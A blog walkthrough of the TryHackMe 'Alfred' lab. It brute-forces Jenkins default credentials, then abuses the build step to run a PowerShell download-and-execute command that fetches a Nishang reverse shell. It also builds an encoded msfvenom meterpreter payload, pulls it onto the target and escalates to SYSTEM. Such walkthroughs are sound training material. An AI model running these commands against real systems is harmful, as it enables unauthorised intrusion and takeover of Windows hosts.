TryHackMe Alfred – How I Solved The Challenge [+Video]

5/5 - (3 votes)
TryHackMe Alfred - How I Solved The Challenge

In this Capture the Flag (CTF) challenge walkthrough, I’ll hack into a windows service called Jenkins, find a way to carry out Remote Command Execution (RCE) by using Metasploit to gain access to the box and escalate my privileges to the NT AUTHORITY/SYSTEM, which is the equivalent of root on a Windows machine.

⚔️ Challenge: I need to capture two “flags”, the user.txt flag and the root.txt flag. Let’s get started!

First, we’ll note down our IP addresses, export them, and run our nmap scan with the flag -Pn to skip host discovery.


export myIP=
export targetIP=

└─$ nmap -Pn
Starting Nmap 7.93 ( ) at 2022-12-10 22:39 EST
Nmap scan report for
Host is up (0.083s latency).
Not shown: 997 filtered tcp ports (no-response)
80/tcp   open  http
3389/tcp open  ms-wbt-server
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 7.05 seconds

We see that there are three open ports.

There is an HTTP service running on port 80. That is presumably a website that we will look at in a moment on our browser.

The ms-wbt-server running on port 3389 looks interesting. A quick google search reveals that it has something to do with the RDP (remote desktop protocol).

Also, the http-proxy on 8080 looks intriguing. On port 80 we find a picture of batman in plainclothes. There’s not much here to see. A quick look at the source HTML code doesn’t reveal anything else interesting.


On port 8080, we find a login page to Jenkins.

Let’s take a few guesses with some of the standard factory-set passwords: admin:password, admin:admin, etc.

Using the proxy intercept and sending it to the intruder function, we can set up a list of passwords and usernames to try as a sniper-style attack.

Based on the different lengths of the responses, we can see that admin:admin may be our winning combination. We are in luck that this company has lazy administrators who don’t properly safeguard their business! The system lets us in as expected with admin:admin.

At TryHackMe’s suggestion, we’ll use Nishang for spawning a revshell from windows. Inside the Jenkins admin dashboard, we can click on project 1 and then edit configure.

In the last text box, we can perform remote command execution. 


First, let’s spawn a reverse shell using PowerShellTcp.ps1 from nishang’s git repo. After downloading the file from the git repo, we launch a Netcat listener with the command: 

nc -lnvp 8888

Then we use the following command in the last text box on Jenkins project 1 settings.

powershell iex (New-Object Net.WebClient).DownloadString(''>

After clicking on “build” in the Jenkin’s dashboard, we catch the shell on our Netcat listener and discover the user.txt flag!



We can create a custom malicious payload to enable us to connect to a more powerful reverse shell within Metasploit using the following command in our attack box:

sudo msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST= LPORT=4444 -f exe -o shell.exe

Now we need to start up Metasploit console:


Load the meterpreter exploit/multi/handler:

use exploit/multi/handler

Set up our payload:

set payload windows/meterpreter/reverse_tcp payload

And finally, type: run

First, we’ll spin up a simple HTTP server to copy shell.exe to windows with:

python -m http.server 8000

Then we can copy and run the file on the target machine by again using remote command execution via the Jenkins edit build function:

powershell "(New-Object System.Net.WebClient).Downloadfile('','shell.exe')"

And Metasploit successfully launches a new meterpreter session on the target box. If the shell.exe file is grabbed successfully from the HTTP server (code 200), but no meterpreter shell is spawned, we can use one more Jenkins RCE to run the revshell:



First, we issue the following command in our meterpreter to automatically escalate to the highest privilege possible:


We now operate with NT AUTHORITY/SYSTEM privileges for most things, but not every single command. To fix this, we can migrate to another process on the target machine.

Entering the command “ps” will give us a list of processes. We’ll use the process system.exe with the following command:

migrate <PID> (process id of the target process running by NT AUTHORITY/SYSTEM, in this case system.exe)

Now we are running metasploit in the RAM of our target machine on the system.exe process. We have full NT AUTHORITY/SYSTEM privileges and can easily find root.txt with the following command:

find -f root.txt

cat root.txt

Thanks for reading/watching my walkthrough. 🙏